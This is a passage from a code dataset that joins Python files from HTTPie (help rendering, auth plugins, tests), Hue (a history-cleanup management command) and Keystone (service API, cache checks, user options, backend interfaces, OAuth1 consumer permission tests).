yield Padding(
options_highlighter(spec.description),
LEFT_INDENT_2,
)
yield Padding(
Text('Usage', style=STYLE_SWITCH),
LEFT_INDENT_2,
)
yield Padding(to_usage(spec), LEFT_INDENT_3)
group_rows = {}
for group in spec.groups:
options_rows = []
for argument in group.arguments:
if argument.is_hidden:
continue
opt1, opt2 = unpack_argument(argument)
if opt2:
opt1.append('/')
opt1.append(opt2)
# Column for a metavar, if we have one
metavar = Text(style=STYLE_METAVAR)
metavar.append(argument.configuration.get('metavar', ''))
if opt1 == metavar:
metavar = Text('')
raw_form = argument.serialize()
desc = raw_form.get('short_description', '')
if raw_form.get('choices'):
desc += ' (choices: '
desc += textwrap.shorten(
', '.join(raw_form.get('choices')),
MAX_CHOICE_CHARS,
)
desc += ')'
rows = [
Padding(
options_highlighter(opt1),
LEFT_PADDING_2,
),
metavar,
options_highlighter(desc),
]
options_rows.append(rows)
if argument.configuration.get('nested_options'):
options_rows.extend(
[
(
Padding(
Text(
key,
style=STYLE_USAGE_OPTIONAL,
),
LEFT_PADDING_4,
),
value,
dec,
)
for key, value, dec in argument.nested_options
]
)
group_rows[group.name] = options_rows
options_table = Table(highlight=False, box=None, show_header=False)
for group_name, options_rows in group_rows.items():
options_table.add_row(Text(), Text(), Text())
options_table.add_row(
Text(group_name, style=STYLE_SWITCH),
Text(),
Text(),
)
options_table.add_row(Text(), Text(), Text())
for row in options_rows:
options_table.add_row(*row)
yield Padding(
Text('Options', style=STYLE_SWITCH),
LEFT_INDENT_2,
)
yield Padding(options_table, LEFT_PADDING_2)
yield Padding(
Text('More Information', style=STYLE_SWITCH),
LEFT_INDENT_2,
)
yield Padding(
MORE_INFO_COMMANDS.rstrip('\n'),
LEFT_PADDING_3
)
yield Padding(
spec.epilog.rstrip('\n'),
LEFT_INDENT_BOTTOM_3,
)
```
#### File: httpie/plugins/builtin.py
```python
from base64 import b64encode
import requests.auth
from .base import AuthPlugin
# noinspection PyAbstractClass
class BuiltinAuthPlugin(AuthPlugin):
package_name = '(builtin)'
class HTTPBasicAuth(requests.auth.HTTPBasicAuth):
def __call__(
self,
request: requests.PreparedRequest
) -> requests.PreparedRequest:
"""
Override username/password serialization to allow unicode.
See https://github.com/httpie/httpie/issues/212
"""
# noinspection PyTypeChecker
request.headers['Authorization'] = type(self).make_header(
self.username, self.password).encode('latin1')
return request
@staticmethod
def make_header(username: str, password: str) -> str:
credentials = f'{username}:{password}'
token = b64encode(credentials.encode()).strip().decode('latin1')
return f'Basic {token}'
class HTTPBearerAuth(requests.auth.AuthBase):
def __init__(self, token: str) -> None:
self.token = token
def __call__(self, request: requests.PreparedRequest) -> requests.PreparedRequest:
request.headers['Authorization'] = f'Bearer {self.token}'
return request
class BasicAuthPlugin(BuiltinAuthPlugin):
name = 'Basic HTTP auth'
auth_type = 'basic'
netrc_parse = True
# noinspection PyMethodOverriding
def get_auth(self, username: str, password: str) -> HTTPBasicAuth:
return HTTPBasicAuth(username, password)
class DigestAuthPlugin(BuiltinAuthPlugin):
name = 'Digest HTTP auth'
auth_type = 'digest'
netrc_parse = True
# noinspection PyMethodOverriding
def get_auth(
self,
username: str,
password: str
) -> requests.auth.HTTPDigestAuth:
return requests.auth.HTTPDigestAuth(username, password)
class BearerAuthPlugin(BuiltinAuthPlugin):
name = 'Bearer HTTP Auth'
auth_type = 'bearer'
netrc_parse = False
auth_parse = False
# noinspection PyMethodOverriding
def get_auth(self, **kwargs) -> requests.auth.HTTPDigestAuth:
return HTTPBearerAuth(self.raw_auth)
```
#### File: tests/fixtures/__init__.py
```python
import json
from pathlib import Path
from typing import Optional, Dict, Any
import httpie
from httpie.encoding import UTF8
from httpie.output.formatters.xml import pretty_xml, parse_xml
def patharg(path):
"""
Back slashes need to be escaped in ITEM args,
even in Windows paths.
"""
return str(path).replace('\\', '\\\\\\')
FIXTURES_ROOT = Path(__file__).parent
FILE_PATH = FIXTURES_ROOT / 'test.txt'
JSON_FILE_PATH = FIXTURES_ROOT / 'test.json'
JSON_WITH_DUPE_KEYS_FILE_PATH = FIXTURES_ROOT / 'test_with_dupe_keys.json'
BIN_FILE_PATH = FIXTURES_ROOT / 'test.bin'
XML_FILES_PATH = FIXTURES_ROOT / 'xmldata'
XML_FILES_VALID = list((XML_FILES_PATH / 'valid').glob('*_raw.xml'))
XML_FILES_INVALID = list((XML_FILES_PATH / 'invalid').glob('*.xml'))
SESSION_FILES_PATH = FIXTURES_ROOT / 'session_data'
SESSION_FILES_OLD = sorted((SESSION_FILES_PATH / 'old').glob('*.json'))
SESSION_FILES_NEW = sorted((SESSION_FILES_PATH / 'new').glob('*.json'))
SESSION_VARIABLES = {
'__version__': httpie.__version__,
'__host__': 'null',
}
FILE_PATH_ARG = patharg(FILE_PATH)
BIN_FILE_PATH_ARG = patharg(BIN_FILE_PATH)
JSON_FILE_PATH_ARG = patharg(JSON_FILE_PATH)
# Strip because we don't want new lines in the data so that we can
# easily count occurrences also when embedded in JSON (where the new
# line would be escaped).
FILE_CONTENT = FILE_PATH.read_text(encoding=UTF8).strip()
ASCII_FILE_CONTENT = "random text" * 10
JSON_FILE_CONTENT = JSON_FILE_PATH.read_text(encoding=UTF8)
BIN_FILE_CONTENT = BIN_FILE_PATH.read_bytes()
UNICODE = FILE_CONTENT
XML_DATA_RAW = '<?xml version="1.0" encoding="utf-8"?><root><e>text</e></root>'
XML_DATA_FORMATTED = pretty_xml(parse_xml(XML_DATA_RAW))
def read_session_file(session_file: Path, *, extra_variables: Optional[Dict[str, str]] = None) -> Any:
with open(session_file) as stream:
data = stream.read()
session_vars = {**SESSION_VARIABLES, **(extra_variables or {})}
for variable, value in session_vars.items():
data = data.replace(variable, value)
return json.loads(data)
```
#### File: httpie/tests/test_errors.py
```python
import pytest
import socket
from unittest import mock
from pytest import raises
from requests import Request
from requests.exceptions import ConnectionError
from httpie.status import ExitStatus
from .utils import HTTP_OK, http
@mock.patch('httpie.core.program')
def test_error(program):
exc = ConnectionError('Connection aborted')
exc.request = Request(method='GET', url='http://www.google.com')
program.side_effect = exc
r = http('www.google.com', tolerate_error_exit_status=True)
assert r.exit_status == ExitStatus.ERROR
error_msg = (
'ConnectionError: '
'Connection aborted while doing a GET request to URL: '
'http://www.google.com'
)
assert error_msg in r.stderr
@mock.patch('httpie.core.program')
def test_error_traceback(program):
exc = ConnectionError('Connection aborted')
exc.request = Request(method='GET', url='http://www.google.com')
program.side_effect = exc
with raises(ConnectionError):
http('--traceback', 'www.google.com')
@mock.patch('httpie.core.program')
@pytest.mark.parametrize("error_code, expected_message", [
(socket.EAI_AGAIN, "check your connection"),
(socket.EAI_NONAME, "check the URL"),
])
def test_error_custom_dns(program, error_code, expected_message):
exc = ConnectionError('Connection aborted')
exc.__context__ = socket.gaierror(error_code, "<test>")
program.side_effect = exc
r = http('www.google.com', tolerate_error_exit_status=True)
assert r.exit_status == ExitStatus.ERROR
assert expected_message in r.stderr
def test_max_headers_limit(httpbin_both):
with raises(ConnectionError) as e:
http('--max-headers=1', httpbin_both + '/get')
assert 'got more than 1 headers' in str(e.value)
def test_max_headers_no_limit(httpbin_both):
assert HTTP_OK in http('--max-headers=0', httpbin_both + '/get')
def test_response_charset_option_unknown_encoding(httpbin_both):
r = http(
'--response-charset=foobar',
httpbin_both + '/get',
tolerate_error_exit_status=True,
)
assert "'foobar' is not a supported encoding" in r.stderr
def test_response_mime_option_invalid_mime_type(httpbin_both):
r = http(
'--response-mime=foobar',
httpbin_both + '/get',
tolerate_error_exit_status=True,
)
assert "'foobar' doesn’t look like a mime type" in r.stderr
``` |
{
"source": "10088/hue",
"score": 2
} |
#### File: management/commands/desktop_document_cleanup.py
```python
import desktop.conf
import desktop.conf
import logging.handlers
import os
import sys
import time
from beeswax.models import SavedQuery
from beeswax.models import Session
from datetime import date, timedelta
from desktop.models import Document2
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db.utils import DatabaseError
from importlib import import_module
from oozie.models import Workflow
if sys.version_info[0] > 2:
from django.utils.translation import gettext_lazy as _t, gettext as _
else:
from django.utils.translation import ugettext_lazy as _t, ugettext as _
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Handler for purging old Query History, Workflow documents and Session data
"""
try:
from optparse import make_option
option_list = BaseCommand.option_list + (
make_option("--keep-days", help=_t("Number of days of history data to keep."),
action="store",
type=int,
default=30),
)
except AttributeError as e:
baseoption_test = 'BaseCommand' in str(e) and 'option_list' in str(e)
if baseoption_test:
def add_arguments(self, parser):
parser.add_argument("--keep-days", help=_t("Number of days of history data to keep."),
action="store",
type=int,
default=30)
else:
LOG.exception(str(e))
sys.exit(1)
def objectCleanup(self, objClass, filterType, filterValue, dateField):
errorCount = 0
checkCount = 0
resets = 0
deleteRecords = self.deleteRecordsBase
totalObjects = objClass.objects.filter(
**{'%s' % filterType: filterValue, '%s__lte' % dateField: self.timeDeltaObj,}) \
.values_list("id", flat=True)
LOG.info("Looping through %s objects. %s objects to be deleted." % (objClass.__name__, totalObjects.count()))
while totalObjects.count():
if deleteRecords < 30 and resets < self.resetMax:
checkCount += 1
if checkCount == self.resetCount:
deleteRecords = self.deleteRecordsBase
resets += 1
checkCount = 0
LOG.info("%s objects left: %s" % (objClass.__name__, totalObjects.count()))
deleteObjects = objClass.objects.filter(
**{'%s' % filterType: filterValue, '%s__lte' % dateField: self.timeDeltaObj,}) \
.values_list("id", flat=True)[:deleteRecords]
try:
objClass.objects.filter(pk__in=list(deleteObjects)).delete()
errorCount = 0
except DatabaseError as e:
LOG.info("Non Fatal Exception: %s: %s" % (e.__class__.__name__, e))
errorCount += 1
if errorCount > 9 and deleteRecords == 1:
raise
if deleteRecords > 100:
deleteRecords = max(deleteRecords - 100, 1)
else:
deleteRecords = max(deleteRecords - 10, 1)
LOG.info("Decreasing max delete records to: %s" % deleteRecords)
totalObjects = objClass.objects.filter(
**{'%s' % filterType: filterValue, '%s__lte' % dateField: self.timeDeltaObj,}) \
.values_list("id", flat=True)
def handle(self, *args, **options):
self.keepDays = options['keep_days']
self.timeDeltaObj = date.today() - timedelta(days=self.keepDays)
self.resetCount = 15
self.resetMax = 5
self.deleteRecordsBase = 999 # number of documents to delete in a batch
# to avoid Non Fatal Exception: DatabaseError: too many SQL variables
LOG.warning("HUE_CONF_DIR: %s" % os.environ['HUE_CONF_DIR'])
LOG.info("DB Engine: %s" % desktop.conf.DATABASE.ENGINE.get())
LOG.info("DB Name: %s" % desktop.conf.DATABASE.NAME.get())
LOG.info("DB User: %s" % desktop.conf.DATABASE.USER.get())
LOG.info("DB Host: %s" % desktop.conf.DATABASE.HOST.get())
LOG.info("DB Port: %s" % str(desktop.conf.DATABASE.PORT.get()))
LOG.info(
"Cleaning up anything in the Hue tables django_session, oozie*, desktop* and beeswax* older than %s old" % self.keepDays)
start = time.time()
# Clean out Hive / Impala Query History
self.objectCleanup(SavedQuery, 'is_auto', True, 'mtime')
# Clear out old Hive/Impala sessions
self.objectCleanup(Session, 'status_code__gte', -10000, 'last_used')
# Clean out Trashed Workflows
try:
self.objectCleanup(Workflow, 'is_trashed', True, 'last_modified')
except NameError as NE:
LOG.info('Oozie app is not configured to clean out trashed workflows')
# Clean out Workflows without a name
try:
self.objectCleanup(Workflow, 'name', '', 'last_modified')
except NameError as NE:
LOG.info('Oozie app is not configured to clean out workflows without a name')
# Clean out history Doc2 objects
self.objectCleanup(Document2, 'is_history', True, 'last_modified')
# Clean out expired sessions
LOG.debug("Cleaning out expired sessions from django_session table")
engine = import_module(settings.SESSION_ENGINE)
try:
engine.SessionStore.clear_expired()
except NotImplementedError:
LOG.error("Session engine '%s' doesn't support clearing "
"expired sessions.\n" % settings.SESSION_ENGINE)
end = time.time()
elapsed = (end - start)
LOG.debug("Total time elapsed (seconds): %.2f" % elapsed)
``` |
{
"source": "10088/keystone",
"score": 2
} |
#### File: keystone/api/services.py
```python
import http.client
from keystone.catalog import schema
from keystone.common import provider_api
from keystone.common import rbac_enforcer
from keystone.common import validation
from keystone.server import flask as ks_flask
ENFORCER = rbac_enforcer.RBACEnforcer
PROVIDERS = provider_api.ProviderAPIs
class ServicesResource(ks_flask.ResourceBase):
collection_key = 'services'
member_key = 'service'
def _get_service(self, service_id):
ENFORCER.enforce_call(action='identity:get_service')
return self.wrap_member(PROVIDERS.catalog_api.get_service(service_id))
def _list_service(self):
filters = ['type', 'name']
ENFORCER.enforce_call(action='identity:list_services', filters=filters)
hints = self.build_driver_hints(filters)
refs = PROVIDERS.catalog_api.list_services(hints=hints)
return self.wrap_collection(refs, hints=hints)
def get(self, service_id=None):
if service_id is not None:
return self._get_service(service_id)
return self._list_service()
def post(self):
ENFORCER.enforce_call(action='identity:create_service')
service = self.request_body_json.get('service')
validation.lazy_validate(schema.service_create, service)
service = self._assign_unique_id(self._normalize_dict(service))
ref = PROVIDERS.catalog_api.create_service(
service['id'], service, initiator=self.audit_initiator)
return self.wrap_member(ref), http.client.CREATED
def patch(self, service_id):
ENFORCER.enforce_call(action='identity:update_service')
service = self.request_body_json.get('service')
validation.lazy_validate(schema.service_update, service)
self._require_matching_id(service)
ref = PROVIDERS.catalog_api.update_service(
service_id, service, initiator=self.audit_initiator)
return self.wrap_member(ref)
def delete(self, service_id):
ENFORCER.enforce_call(action='identity:delete_service')
return PROVIDERS.catalog_api.delete_service(
service_id, initiator=self.audit_initiator), http.client.NO_CONTENT
class ServiceAPI(ks_flask.APIBase):
_name = 'services'
_import_name = __name__
resources = [ServicesResource]
resource_mapping = []
APIs = (ServiceAPI,)
```
#### File: cmd/doctor/caching.py
```python
from keystone.common import cache
import keystone.conf
CONF = keystone.conf.CONF
def symptom_caching_disabled():
"""`keystone.conf [cache] enabled` is not enabled.
Caching greatly improves the performance of keystone, and it is highly
recommended that you enable it.
"""
return not CONF.cache.enabled
def symptom_caching_enabled_without_a_backend():
"""Caching is not completely configured.
Although caching is enabled in `keystone.conf [cache] enabled`, the default
backend is still set to the no-op backend. Instead, configure keystone to
point to a real caching backend like memcached.
"""
return CONF.cache.enabled and CONF.cache.backend == 'dogpile.cache.null'
def symptom_connection_to_memcached():
"""Memcached isn't reachable.
Caching is enabled and the `keystone.conf [cache] backend` option is
configured but one or more Memcached servers are not reachable or marked
as dead. Please ensure `keystone.conf [cache] memcache_servers` is
configured properly.
"""
memcached_drivers = [
'dogpile.cache.memcached',
'oslo_cache.memcache_pool'
]
if CONF.cache.enabled and CONF.cache.backend in memcached_drivers:
cache.configure_cache()
cache_stats = cache.CACHE_REGION.actual_backend.client.get_stats()
memcached_server_count = len(CONF.cache.memcache_servers)
if len(cache_stats) != memcached_server_count:
return True
else:
return False
else:
return False
```
#### File: identity/backends/resource_options.py
```python
from keystone.common import resource_options
from keystone.common.validation import parameter_types
from keystone.i18n import _
def _mfa_rules_validator_list_of_lists_of_strings_no_duplicates(value):
# NOTE(notmorgan): This should possibly validate that the auth-types
# are enabled? For now it simply validates the following:
#
# Must be a list of lists, each sub list must be a list of strings
# e.g. [['str1', 'str2'], ['str3', 'str4']]
# No sub-list may be empty. Duplication of sub-lists and duplication of
# string elements are not permitted.
msg = _('Invalid data type, must be a list of lists comprised of strings. '
'Sub-lists may not be duplicated. Strings in sub-lists may not be '
'duplicated.')
if not isinstance(value, list):
# Value is not a List, TypeError
raise TypeError(msg)
sublists = []
for sublist in value:
# Sublist element tracker is reset for each sublist.
string_set = set()
if not isinstance(sublist, list):
# Sublist is not a List, TypeError
raise TypeError(msg)
if not sublist:
# Sublist is Empty, ValueError
raise ValueError(msg)
if sublist in sublists:
# Sublist is duplicated, ValueError
raise ValueError(msg)
# Add the sublist to the tracker
sublists.append(sublist)
for element in sublist:
if not isinstance(element, str):
# Element of sublist is not a string, TypeError
raise TypeError(msg)
if element in string_set:
# Element of sublist is duplicated, ValueError
raise ValueError(msg)
# add element to the sublist element tracker
string_set.add(element)
USER_OPTIONS_REGISTRY = resource_options.ResourceOptionRegistry('USER')
IGNORE_CHANGE_PASSWORD_OPT = (
resource_options.ResourceOption(
option_id='1000',
option_name='ignore_change_password_upon_first_use',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
IGNORE_PASSWORD_EXPIRY_OPT = (
resource_options.ResourceOption(
option_id='1001',
option_name='ignore_password_expiry',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
IGNORE_LOCKOUT_ATTEMPT_OPT = (
resource_options.ResourceOption(
option_id='1002',
option_name='ignore_lockout_failure_attempts',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
LOCK_PASSWORD_OPT = (
resource_options.ResourceOption(
option_id='1003',
option_name='lock_password',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
IGNORE_USER_INACTIVITY_OPT = (
resource_options.ResourceOption(
option_id='1004',
option_name='ignore_user_inactivity',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
MFA_RULES_OPT = (
resource_options.ResourceOption(
option_id='MFAR',
option_name='multi_factor_auth_rules',
validator=_mfa_rules_validator_list_of_lists_of_strings_no_duplicates,
json_schema_validation={
# List
'type': 'array',
'items': {
# Of Lists
'type': 'array',
'items': {
# Of Strings, each string must be unique, minimum 1
# element
'type': 'string',
},
'minItems': 1,
'uniqueItems': True
},
'uniqueItems': True
}))
MFA_ENABLED_OPT = (
resource_options.ResourceOption(
option_id='MFAE',
option_name='multi_factor_auth_enabled',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
# NOTE(notmorgan): wrap this in a function for testing purposes.
# This is called on import by design.
def register_user_options():
for opt in [
IGNORE_CHANGE_PASSWORD_OPT,
IGNORE_PASSWORD_EXPIRY_OPT,
IGNORE_LOCKOUT_ATTEMPT_OPT,
LOCK_PASSWORD_OPT,
IGNORE_USER_INACTIVITY_OPT,
MFA_RULES_OPT,
MFA_ENABLED_OPT,
]:
USER_OPTIONS_REGISTRY.register_option(opt)
register_user_options()
```
#### File: identity/shadow_backends/base.py
```python
import abc
from keystone import exception
def federated_objects_to_list(fed_ref):
"""Create a new reformatted federated object list using the one passed in.
When returning federated objects with a user we only need the attributes
idp_id, protocol_id, and unique_id. Therefore, we pull these elements out
of the fed_ref and create a newly formatted list with the needed
information. We simply group each federated object's protocol_ids and
unique_ids under the corresponding idp_id.
:returns list: Containing the user's federated objects
"""
if not fed_ref:
return []
fed = {}
for fed_dict in fed_ref:
fed.setdefault(
fed_dict['idp_id'],
{
'idp_id': fed_dict['idp_id'],
'protocols': []
}
)['protocols'].append({
'protocol_id': fed_dict['protocol_id'],
'unique_id': fed_dict['unique_id']
})
return list(fed.values())
class ShadowUsersDriverBase(object, metaclass=abc.ABCMeta):
"""Interface description for an Shadow Users driver."""
@abc.abstractmethod
def create_federated_object(self, fed_dict):
"""Create a new federated object.
:param dict federated_dict: Reference to the federated user
"""
raise exception.NotImplemented()
@abc.abstractmethod
def create_federated_user(self, domain_id, federated_dict, email=None):
"""Create a new user with the federated identity.
:param domain_id: The domain ID of the IdP used for the federated user
:param dict federated_dict: Reference to the federated user
:param email: Federated user's email
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
def delete_federated_object(self, user_id):
"""Delete a user's federated objects.
:param user_id: Unique identifier of the user
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_federated_objects(self, user_id):
"""Get all federated objects for a user.
:param user_id: Unique identifier of the user
:returns list: Containing the user's federated objects
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_federated_user(self, idp_id, protocol_id, unique_id):
"""Return the found user for the federated identity.
:param idp_id: The identity provider ID
:param protocol_id: The federation protocol ID
:param unique_id: The unique ID for the user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def update_federated_user_display_name(self, idp_id, protocol_id,
unique_id, display_name):
"""Update federated user's display name if changed.
:param idp_id: The identity provider ID
:param protocol_id: The federation protocol ID
:param unique_id: The unique ID for the user
:param display_name: The user's display name
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_user(self, user_id):
"""Return the found user.
:param user_id: Unique identifier of the user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def create_nonlocal_user(self, user_dict):
"""Create a new non-local user.
:param dict user_dict: Reference to the non-local user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def set_last_active_at(self, user_id):
"""Set the last active at date for the user.
:param user_id: Unique identifier of the user
"""
raise exception.NotImplemented()
@abc.abstractmethod
def list_federated_users_info(self, hints=None):
"""Get the shadow users info with the specified filters.
:param hints: contains the list of filters yet to be satisfied.
Any filters satisfied here will be removed so that
the caller will know if any filters remain.
:returns list: A list of objects that containing the shadow users
reference.
"""
raise exception.NotImplemented()
```
#### File: resource/backends/base.py
```python
import abc
import keystone.conf
from keystone import exception
CONF = keystone.conf.CONF
def get_project_from_domain(domain_ref):
"""Create a project ref from the provided domain ref."""
project_ref = domain_ref.copy()
project_ref['is_domain'] = True
project_ref['domain_id'] = None
project_ref['parent_id'] = None
return project_ref
# The provided SQL driver uses a special value to represent a domain_id of
# None. See comment in Project class of resource/backends/sql.py for more
# details.
NULL_DOMAIN_ID = '<<keystone.domain.root>>'
class ResourceDriverBase(object, metaclass=abc.ABCMeta):
def _get_list_limit(self):
return CONF.resource.list_limit or CONF.list_limit
# project crud
@abc.abstractmethod
def list_projects(self, hints):
"""List projects in the system.
:param hints: filter hints which the driver should
implement if at all possible.
:returns: a list of project_refs or an empty list.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_projects_from_ids(self, project_ids):
"""List projects for the provided list of ids.
:param project_ids: list of ids
:returns: a list of project_refs.
This method is used internally by the assignment manager to bulk read
a set of projects given their ids.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_project_ids_from_domain_ids(self, domain_ids):
"""List project ids for the provided list of domain ids.
:param domain_ids: list of domain ids
:returns: a list of project ids owned by the specified domain ids.
This method is used internally by the assignment manager to bulk read
a set of project ids given a list of domain ids.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_projects_in_domain(self, domain_id):
"""List projects in the domain.
:param domain_id: the driver MUST only return projects
within this domain.
:returns: a list of project_refs or an empty list.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def get_project(self, project_id):
"""Get a project by ID.
:returns: project_ref
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def update_project(self, project_id, project):
"""Update an existing project.
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
:raises keystone.exception.Conflict: if project name already exists
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def delete_project(self, project_id):
"""Delete an existing project.
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_project_parents(self, project_id):
"""List all parents from a project by its ID.
:param project_id: the driver will list the parents of this
project.
:returns: a list of project_refs or an empty list.
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented()
@abc.abstractmethod
def list_projects_in_subtree(self, project_id):
"""List all projects in the subtree of a given project.
:param project_id: the driver will get the subtree under
this project.
:returns: a list of project_refs or an empty list
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented()
@abc.abstractmethod
def is_leaf_project(self, project_id):
"""Check if a project is a leaf in the hierarchy.
:param project_id: the driver will check if this project
is a leaf in the hierarchy.
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented()
def _validate_default_domain(self, ref):
"""Validate that either the default domain or nothing is specified.
Also removes the domain from the ref so that LDAP doesn't have to
persist the attribute.
"""
ref = ref.copy()
domain_id = ref.pop('domain_id', CONF.identity.default_domain_id)
self._validate_default_domain_id(domain_id)
return ref
def _validate_default_domain_id(self, domain_id):
"""Validate that the domain ID belongs to the default domain."""
if domain_id != CONF.identity.default_domain_id:
raise exception.DomainNotFound(domain_id=domain_id)
@abc.abstractmethod
def create_project(self, project_id, project):
"""Create a new project.
:param project_id: This parameter can be ignored.
:param dict project: The new project
Project schema::
type: object
properties:
id:
type: string
name:
type: string
domain_id:
type: [string, null]
description:
type: string
enabled:
type: boolean
parent_id:
type: string
is_domain:
type: boolean
required: [id, name, domain_id]
additionalProperties: true
If the project doesn't match the schema the behavior is undefined.
The driver can impose requirements such as the maximum length of a
field. If these requirements are not met the behavior is undefined.
:raises keystone.exception.Conflict: if the project id already exists
or the name already exists for the domain_id.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def get_project_by_name(self, project_name, domain_id):
"""Get a project by name.
:returns: project_ref
:raises keystone.exception.ProjectNotFound: if a project with the
project_name does not exist within the domain
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def delete_projects_from_ids(self, project_ids):
"""Delete a given list of projects.
Deletes a list of projects. Ensures no project on the list exists
after it is successfully called. If an empty list is provided,
the it is silently ignored. In addition, if a project ID in the list
of project_ids is not found in the backend, no exception is raised,
but a message is logged.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_projects_acting_as_domain(self, hints):
"""List all projects acting as domains.
:param hints: filter hints which the driver should
implement if at all possible.
:returns: a list of project_refs or an empty list.
"""
raise exception.NotImplemented() # pragma: no cover
def check_project_depth(self, max_depth):
"""Check the projects depth in the backend whether exceed the limit.
:param max_depth: the limit depth that project depth should not exceed.
:type max_depth: integer
:returns: the exceeded project's id or None if no exceeding.
"""
raise exception.NotImplemented() # pragma: no cover
```
#### File: protection/v3/test_consumer.py
```python
import uuid
import http.client
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _SystemUserOauth1ConsumerTests(object):
"""Common default functionality for all system users."""
def test_user_can_get_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.get('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
headers=self.headers)
def test_user_can_list_consumers(self):
PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.get('/v3/OS-OAUTH1/consumers',
headers=self.headers)
class _SystemReaderAndMemberOauth1ConsumerTests(object):
def test_user_cannot_create_consumer(self):
with self.test_client() as c:
c.post('/v3/OS-OAUTH1/consumers',
json={'consumer': {}},
expected_status_code=http.client.FORBIDDEN,
headers=self.headers)
def test_user_cannot_update_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.patch('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
json={'consumer': {'description': uuid.uuid4().hex}},
expected_status_code=http.client.FORBIDDEN,
headers=self.headers)
def test_user_cannot_delete_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.delete('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
expected_status_code=http.client.FORBIDDEN,
headers=self.headers)
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserOauth1ConsumerTests,
_SystemReaderAndMemberOauth1ConsumerTests):
def setUp(self):
super(SystemReaderTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_reader = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.user_id = PROVIDERS.identity_api.create_user(
system_reader
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.user_id, self.bootstrapper.reader_role_id
)
auth = self.build_authentication_request(
user_id=self.user_id, password=system_reader['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemMemberTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserOauth1ConsumerTests,
_SystemReaderAndMemberOauth1ConsumerTests):
def setUp(self):
super(SystemMemberTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_member = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.user_id = PROVIDERS.identity_api.create_user(
system_member
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.user_id, self.bootstrapper.member_role_id
)
auth = self.build_authentication_request(
user_id=self.user_id, password=<PASSWORD>['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemAdminTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserOauth1ConsumerTests):
def setUp(self):
super(SystemAdminTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
# Reuse the system administrator account created during
# ``keystone-manage bootstrap``
self.user_id = self.bootstrapper.admin_user_id
auth = self.build_authentication_request(
user_id=self.user_id,
password=self.bootstrapper.admin_password,
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
def test_user_can_create_consumer(self):
